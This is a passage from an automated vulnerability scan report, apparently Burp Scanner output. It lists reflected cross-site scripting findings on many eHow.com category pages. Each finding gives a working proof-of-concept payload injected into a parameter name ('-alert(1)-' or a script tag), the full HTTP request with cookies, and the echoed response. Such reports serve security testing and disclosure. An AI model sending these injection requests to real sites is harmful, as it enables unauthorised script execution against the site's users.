The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b5e0'-alert(1)-'eff10e5d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72021
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Culture & Society - How To Information | eHow.com ...[SNIP]... <fb:like href="http://www.ehow.com/culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1" ref="like" width="300"> ...[SNIP]...
1.364. http://www.ehow.com/diseases-and-conditions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/diseases-and-conditions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faf8'-alert(1)-'92bb278d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:32 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71305
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Diseases & Conditions - How To Information | eHow ...[SNIP]... <fb:like href="http://www.ehow.com/diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1" ref="like" width="300"> ...[SNIP]...
1.365. http://www.ehow.com/drugs-and-supplements/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/drugs-and-supplements/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe97d'-alert(1)-'7b1d74f9c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /drugs-and-supplements/?fe97d'-alert(1)-'7b1d74f9c1b=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:51 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72692
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Drugs & Supplements - How To Information | eHow.c ...[SNIP]... <fb:like href="http://www.ehow.com/drugs-and-supplements/?fe97d'-alert(1)-'7b1d74f9c1b=1" ref="like" width="300"> ...[SNIP]...
1.366. http://www.ehow.com/education/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/education/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6087c'-alert(1)-'194ef36dd58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/?6087c'-alert(1)-'194ef36dd58=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:02 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75234
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Education - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/education/?6087c'-alert(1)-'194ef36dd58=1" ref="like" width="300"> ...[SNIP]...
1.367. http://www.ehow.com/ehow-family/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c767"><script>alert(1)</script>be6c4ab1e42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-family/?7c767"><script>alert(1)</script>be6c4ab1e42=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45027
1.368. http://www.ehow.com/ehow-food/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-food/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b3a1"><script>alert(1)</script>79143987f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-food/?6b3a1"><script>alert(1)</script>79143987f86=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46088
1.369. http://www.ehow.com/ehow-health/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f509"><script>alert(1)</script>873ede6293d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-health/?3f509"><script>alert(1)</script>873ede6293d=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43261
1.370. http://www.ehow.com/ehow-home/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-home/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3196"><script>alert(1)</script>92b0e28812b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-home/?d3196"><script>alert(1)</script>92b0e28812b=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45054
1.371. http://www.ehow.com/ehow-money/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-money/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5f86"><script>alert(1)</script>d7f01f7f7f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-money/?f5f86"><script>alert(1)</script>d7f01f7f7f6=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:11 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46741
1.372. http://www.ehow.com/ehow-style/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-style/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497ab"><script>alert(1)</script>953c40a3a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-style/?497ab"><script>alert(1)</script>953c40a3a58=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45257
1.373. http://www.ehow.com/ehow-tax-time/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/ehow-tax-time/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c261"><script>alert(1)</script>ad4ad1bb267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ehow-tax-time/?7c261"><script>alert(1)</script>ad4ad1bb267=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:11 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43139
1.374. http://www.ehow.com/electronics/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/electronics/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 535c5'-alert(1)-'e8bfb8c2480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics/?535c5'-alert(1)-'e8bfb8c2480=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70812
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Electronics - How To Information | eHow.com</titl ...[SNIP]... <fb:like href="http://www.ehow.com/electronics/?535c5'-alert(1)-'e8bfb8c2480=1" ref="like" width="300"> ...[SNIP]...
1.375. http://www.ehow.com/family-health/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/family-health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3603c'-alert(1)-'0c79c8c5b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family-health/?3603c'-alert(1)-'0c79c8c5b9e=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72073
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Family Health - How To Information | eHow.com</ti ...[SNIP]... <fb:like href="http://www.ehow.com/family-health/?3603c'-alert(1)-'0c79c8c5b9e=1" ref="like" width="300"> ...[SNIP]...
1.376. http://www.ehow.com/fashion-and-style/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/fashion-and-style/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e622d'-alert(1)-'816f55ab996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-and-style/?e622d'-alert(1)-'816f55ab996=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:00 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71917
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fashion & Style - How To Information | eHow.com</ ...[SNIP]... <fb:like href="http://www.ehow.com/fashion-and-style/?e622d'-alert(1)-'816f55ab996=1" ref="like" width="300"> ...[SNIP]...
1.377. http://www.ehow.com/fitness/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/fitness/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1122d'-alert(1)-'dc35503d8e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fitness/?1122d'-alert(1)-'dc35503d8e3=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:59 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71761
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fitness - How To Information | eHow.com</title>
1.378. http://www.ehow.com/food-and-drink/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/food-and-drink/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc0e'-alert(1)-'5a32fd4a744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:58 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73340
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Food & Drink - How To Information | eHow.com</tit ...[SNIP]... <fb:like href="http://www.ehow.com/food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1" ref="like" width="300"> ...[SNIP]...
1.379. http://www.ehow.com/healthcare/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/healthcare/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9aaa'-alert(1)-'75a70bf2071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcare/?f9aaa'-alert(1)-'75a70bf2071=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71152
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthcare - How To Information | eHow.com</title ...[SNIP]... <fb:like href="http://www.ehow.com/healthcare/?f9aaa'-alert(1)-'75a70bf2071=1" ref="like" width="300"> ...[SNIP]...
1.380. http://www.ehow.com/healthy-living/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/healthy-living/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f38f'-alert(1)-'8c7b03448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthy-living/?9f38f'-alert(1)-'8c7b03448=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:17 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68271
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Healthy Living - How To Information | eHow.com</t ...[SNIP]... <fb:like href="http://www.ehow.com/healthy-living/?9f38f'-alert(1)-'8c7b03448=1" ref="like" width="300"> ...[SNIP]...
1.381. http://www.ehow.com/hobbies-and-science/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/hobbies-and-science/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e398d'-alert(1)-'06fc955b57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
